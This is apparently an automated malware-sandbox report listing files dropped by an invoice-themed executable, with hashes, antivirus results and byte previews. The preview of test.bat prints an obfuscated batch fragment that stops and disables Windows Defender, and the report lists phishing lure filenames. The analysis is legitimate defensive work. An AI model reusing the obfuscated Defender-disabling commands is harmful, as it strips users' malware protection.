                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D4B.tmp.dmp
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Feb 25 14:10:52 2021, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):315756
                                                                                                              Entropy (8bit):3.8109134708487242
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:FmIQyDfKoVveyn690bXjd+pxXAeYgIisW9gIOgF5TNbe0FUCgUBFD6:AIHTKgvO90bAp79RpDTFeSTj3e
                                                                                                              MD5:3F24F840B9869D223F418F51FDF47CE1
                                                                                                              SHA1:AF8472652BCE682B6E7C40F52970085B9CC09760
                                                                                                              SHA-256:72C7F9ED7BC6EA7DABD19108F7139DE3C2CBD01655952E74876D294854DE4ABC
                                                                                                              SHA-512:68F5FAE6D98A148ADFD411CA59D5D8CD675F34E70D5EC92D83CD73E03059174EECFE5FE3078D7DF04B0C46989A71B153F56119CE838671DC985EABAEC63BF11C
                                                                                                              Malicious:false
                                                                                                              Preview: MDMP....... ........7`...................U...........B......4-......GenuineIntelW...........T.............7`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E2E.tmp.WERInternalMetadata.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8494
                                                                                                              Entropy (8bit):3.710666372851257
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Rrl7r3GLNiKeD60V6Yr/SU+N5mTKTPgmfZoS/+pry89bZ6sf3xzm:RrlsNiKC6m6YTSU+N5mObgmfSSAZZf3o
                                                                                                              MD5:5791974E34FF7956C4D230782FB8F5A6
                                                                                                              SHA1:FAD63F7331FE93C1139385D36564AA23636F297D
                                                                                                              SHA-256:DF2F547053D6C1D141602D01960B93BA93B65B78AC1324345BFEFFC4D2F9CE36
                                                                                                              SHA-512:2BE303A58ED70D8DC700B87D52D30391277D9A8B0A147AC2F6DA53A02BADD73501700F4F049724BDC18D42E88B051D960408B23AF82C07FBE368EE45F5A6825C
                                                                                                              Malicious:false
                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.1.6.<./.P.i.d.>.......
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA68B.tmp.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4800
                                                                                                              Entropy (8bit):4.567228996532901
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwSD8zs1tJgtWI9rKkWSC8Bvs8fm8M4Jeh/FFht+q8vFh//KA71zd:uITf1HcKSNxRJu5tKrHKA71zd
                                                                                                              MD5:50E2A91F31E670B3054F60A2D52F8528
                                                                                                              SHA1:6782321474333481C3B34B19D02AA6040FAAE43F
                                                                                                              SHA-256:C7B28C9B73B1C111AA04D79D2544CBDF75DD194D61CC392EBEAD7A5120174720
                                                                                                              SHA-512:47FCD52CFD76B663B9A066BD35DF9525B0865A3EFB8EC71FDA0A773EACC80C37D88BDCBC3866FB580903F20DDBCACF44EC8534C01A5B6A7867085BA5CB81E8E5
                                                                                                              Malicious:false
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="876921" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6E7.tmp.csv
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56208
                                                                                                              Entropy (8bit):3.0530640921878747
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:aDHQeMGIvhCOc9+sA3BCrbKpO+f03hfvc:aDHQeMGIvhCOc9+sA3BCrbKpO+f035vc
                                                                                                              MD5:70B4C3FFC96DD244F3772D6F81B0783C
                                                                                                              SHA1:4B086568DF91ADEA95A354B0BBC745950A51AFFA
                                                                                                              SHA-256:71FAE19F2A3FC6FF96106AD7D829A3D5BE55A3FA06EFA8FEA77E3239E076632A
                                                                                                              SHA-512:7CD460FF3279077C2F22B09676127371D924046A7AF82850FCC9C5F20EBDB378E1BF7C3DA0DD08D08B3257C8300C17355D64E86474F91F4C1037B9A14E8AC24F
                                                                                                              Malicious:false
                                                                                                              Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERACC4.tmp.txt
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):13340
                                                                                                              Entropy (8bit):2.6955683935498898
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:9GiZYW+TUve8IYHYcb4WgHNYEZhgst2iG9zEXwtIxraKhaAJiOnIS53:9jZD+HQzbQPNaKhaAcZS53
                                                                                                              MD5:9E8DFC94FEF322FE02E9F7E48376894A
                                                                                                              SHA1:12BD9CA05D34330269DA55CC174B9020A91BC5B0
                                                                                                              SHA-256:A81606A41BE21D9687FD67C1FF81BFF367F0F5E6BA228EB72B0E4F404EA72FEB
                                                                                                              SHA-512:6EC0936F401B10A335253BC3FAFE9D710CE8CC3E0DA95E0141C062989BD85E00CC9AFE0EF1CB2512316433F918C1C573C8DDF98DAB5722A1DBA17473484FF392
                                                                                                              Malicious:false
                                                                                                              Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):14734
                                                                                                              Entropy (8bit):4.996142136926143
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
                                                                                                              MD5:B7D3A4EB1F0AED131A6E0EDF1D3C0414
                                                                                                              SHA1:A72E0DDE5F3083632B7242D2407658BCA3E54F29
                                                                                                              SHA-256:8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
                                                                                                              SHA-512:F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
                                                                                                              Malicious:false
                                                                                                              Preview: PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):21664
                                                                                                              Entropy (8bit):5.600013791978551
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:/tL68qUkj8c5Eh2MQX+Rw4KnKultIqspE9mw7AhBmzq5vxHV03fjj2DI++jp:uj8cSh2Z4KKultAV3qqtibcc
                                                                                                              MD5:250E88BCD42F9C0B7EEB5173BE816D5B
                                                                                                              SHA1:5A1053254E192BE05F99BBC0F0A8ACD7550CC11B
                                                                                                              SHA-256:E0351D82E30A3C884B6950D68A1B7A3F1994B12E48488AF55E6E589FDEBB8D95
                                                                                                              SHA-512:0E4133E4B8B7C1770EA241FECFA883DAC49EA6BF167D8784ADC4F83CA75F7B8415A088DA102BFEAF0824428978346D69A60F99FCBAFDE001B12247C768730E55
                                                                                                              Malicious:false
                                                                                                              Preview: @...e.....................9.............?............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)Z.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                                                              C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: PRODUCT SPECIFICATION.exe, Detection: malicious, Browse
                                                                                                              • Filename: DHL_document1102202068090891.exe, Detection: malicious, Browse
                                                                                                              • Filename: em6eElVbOm.exe, Detection: malicious, Browse
                                                                                                              • Filename: Purchase Order_Pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: Fireman.exe, Detection: malicious, Browse
                                                                                                              • Filename: NEW ORDER.exe, Detection: malicious, Browse
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious, Browse
                                                                                                              • Filename: payment confirmation 0029175112.exe, Detection: malicious, Browse
                                                                                                              • Filename: Vrxs6evJO7.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe, Detection: malicious, Browse
                                                                                                              • Filename: RMe2JcmlSh.exe, Detection: malicious, Browse
                                                                                                              • Filename: New Order 2300030317388 InterMetro.exe, Detection: malicious, Browse
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse
                                                                                                              • Filename: PURCHASE ITEMS.exe, Detection: malicious, Browse
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287992.exe, Detection: malicious, Browse
                                                                                                              • Filename: quotation_PR # 00459182..exe, Detection: malicious, Browse
                                                                                                              • Filename: PURCHASE ORDER CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                              • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                              • Filename: PO#87498746510.exe, Detection: malicious, Browse
                                                                                                              • Filename: TT.exe, Detection: malicious, Browse
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhngzly1.1a0.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fiaxfjc3.2me.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ginmqqci.bv3.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaqb5cyd.oyj.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
